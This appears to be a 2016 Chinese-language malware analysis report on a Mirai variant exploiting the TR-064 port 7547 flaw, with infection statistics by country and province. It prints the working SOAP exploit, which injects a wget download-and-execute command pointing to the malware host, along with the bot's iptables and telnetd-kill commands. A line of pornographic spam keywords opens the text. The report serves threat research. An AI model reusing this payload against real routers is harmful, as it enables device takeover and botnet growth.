国精品无码一区二区三区在线,欧美性XXXXX极品少妇,亚洲伊人成无码综合网

安天追影小組分析Mirai變種新傳播方式

時間 :  2016年12月19日  來源:  安天


      安天聯合電信云堤發布針對Mirai新變種威脅分析報告,利用捕風蜜罐捕獲到Mirai新變種,該變種采用最近公布的7547端口漏洞,并對公布漏洞的payload進行了修改使之可以下載執行Mirai。通過互聯網流量監控發現了大量IoT設備進行7547端口掃描,這些設備已經被新Mirai變種攻陷,目前監測到超過30萬IoT設備感染。

 

      近期披露的D1000TR064 服務器 TCP 端口 7547漏洞,通過發送某些 TR 064 命令,可以指示運行該服務的設備打開防火墻上的 80端口。允許從互聯網訪問設備的web 管理界面。D1000 的默認登錄密碼是默認 Wi-fi 密碼,也可以通過另一個TR064指令獲取。該漏洞關鍵代碼是向端口7547發送TR 064命令,設置新NTP服務器的方式,在NewNTPServer1中采用指令iptables -IINPUT -p tcp --dport 80 -j ACCEPT解除防火墻對80訪問限制。以下是重要的代碼片段:
 


 

      Mirai變種的C&C配置加密方式與源碼泄露的家族沒有變化。連接C&C服務器timeserver.host(5.8.65.138)的23端口,上線包數據為0x00000001。

      在被感染的路由器執行以下命令:

busybox  iptables -A INPUT -p tcp --destination-port 7547 -j DROP

busybox  killall -9 telnetd


      第一個命令是關閉7547端口,是為了避免重復感染,也使其他攻擊者不能再利用這個漏洞;第二個命令是停止telnet服務,使用戶無法遠程更新固件。然后,生成隨機IP,對這些IP的7547端口進行掃描與漏洞入侵。樣本利用7547漏洞進行了相應的改造,使攻擊直接下載遠程樣本,修改可執行模式并且運行。該樣本中包含三個遠程樣本URL,分別為:http://l.ocalhost.host/1、http:// l.ocalhost.host/2、http:// l.ocalhost.host/3。

 

      攻擊代碼POST數據如下:

 

      <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 

      <SOAP-ENV:Body>  

      <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   

      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/3;chmod 777 3;./3`</NewNTPServer1>   

      <NewNTPServer2></NewNTPServer2>   

      <NewNTPServer3></NewNTPServer3>   

      <NewNTPServer4></NewNTPServer4>   

      <NewNTPServer5></NewNTPServer5>  

      </u:SetNTPServers> 

      </SOAP-ENV:Body>

      </SOAP-ENV:Envelope>

 

       該放馬域名l.ocalhost.host是黑客利用漏洞快速傳播Mirai變種之前新注冊2016年11月26日解析的IP包括兩個:


      2016-11-28 5.8.65.140


      2016-11-27 188.209.49.60

 

      通過電信云堤抽樣流量分析獲得如下信息:

 

  • 確認被感染具有7547掃描能力的節點主要通過包括掃描節點自身是IoT設備,掃描節點多次使用相同端口掃描,掃描節點發出攻擊漏洞方法進行發現。

  • 確認感染設備總數:306778

  • 感染設備主要開放服務或設備信息包括RomPager/4.07、DVRDVS、TR069 Connect Request Server、DHT Nodes、HuaweiHomeGateway。


      目前發現感染的主要節點分布地區 (列表)
 

地區 感染設備總數
巴西 107166
英國 61854
愛爾蘭 18268
拉美其它地區 17210
土耳其 13863
伊朗 11573
澳大利亞 8002
泰國 7159
意大利 6243
芬蘭 5294
智利 4937
阿根廷 3659
中國 3321
法國 2160
巴基斯坦 2095
其它北美地區(非美國) 1916
希臘 1712
羅馬尼亞 1485
印度 1197
西班牙 1187
越南 761
俄羅斯 599
德國 529
美國 488
馬來西亞 471
其它歐洲和中東地區 367
瑞典 352
玻利維亞 341
格魯吉亞 341
其它歐洲地區 260
新西蘭 224
塞爾維亞 169
捷克 140
南非 108
其它亞太地區 102
瑞士 98
哥倫比亞 91
阿爾巴尼亞 87
其它非洲地區 79
馬達加斯加 75
摩洛哥 72
丹麥 69
波斯尼亞和黑塞哥維那 67
洪都拉斯 67
秘魯 64
埃及 43
愛沙尼亞 33
日本 31
阿塞拜疆 30
波蘭 27
圣馬力諾 26
斯洛伐克 15
印度尼西亞 13
立陶宛 11
利比亞 11
阿曼 10
韓國 10
科威特 10
阿聯酋 9
葡萄牙 9
奧地利 7
菲律賓 7
荷蘭 7
烏克蘭 7
敘利亞 6
阿爾及利亞 5
巴拉圭 5
塞內加爾 5
也門 5
巴勒斯坦 4
巴林 4
岡比亞 4
加拿大 4
盧森堡 4
馬爾代夫 4
薩爾瓦多 4
伊拉克 4
比利時 3
哈薩克斯坦 3
拉脫維亞 3
新加坡 3
新喀里多尼亞 3
冰島 2
科特迪瓦 2
黎巴嫩 2
挪威 2
沙特阿拉伯 2
坦桑尼亞 2
以色列 2
多米尼加 1
佛得角 1
黑山 1
加蓬 1
老撾 1
孟加拉 1
摩爾多瓦 1
莫桑比克 1
尼泊爾 1
尼日利亞 1
所羅門群島 1
委內瑞拉 1
烏茲別克斯坦 1
亞美尼亞 1


      國內部分感染節點分布圖:

 


注:本圖由電信云堤提供
 

國內感染節點分布表
 

省份 感染設備總數
廣東省 508
江蘇省 345
浙江省 240
福建省 219
湖北省 186
上海市 182
山東省 176
湖南省 148
四川省 131
河南省 107
北京市 94
廣西省 93
安徽省 92
河北省 89
云南省 78
遼寧省 77
陜西省 62
天津市 56
江西省 55
山西省 55
貴州省 51
重慶市 51
吉林省 40
黑龍江省 38
甘肅省 31
香港 17
海南省 17
臺灣 11
西藏自治區 5
寧夏回族自治區 4
青海省 2
澳門 尚未發現

 

      參考文獻鏈接:
 

      [1].   http://www.vfocus.net/art/20161109/13085.html
 

      [2].  https://www.broadband-forum.org/technical/download/TR-064.pdf

 

      注:

 

      本分析報告由安天追影小組與電信云堤聯合發布,如您認為對網絡安全有價值,請轉載時注明,并附上鏈接。

 

      本分析報告錯漏缺點在所難免,敬請業內專家和研究者回帖指點批評指正。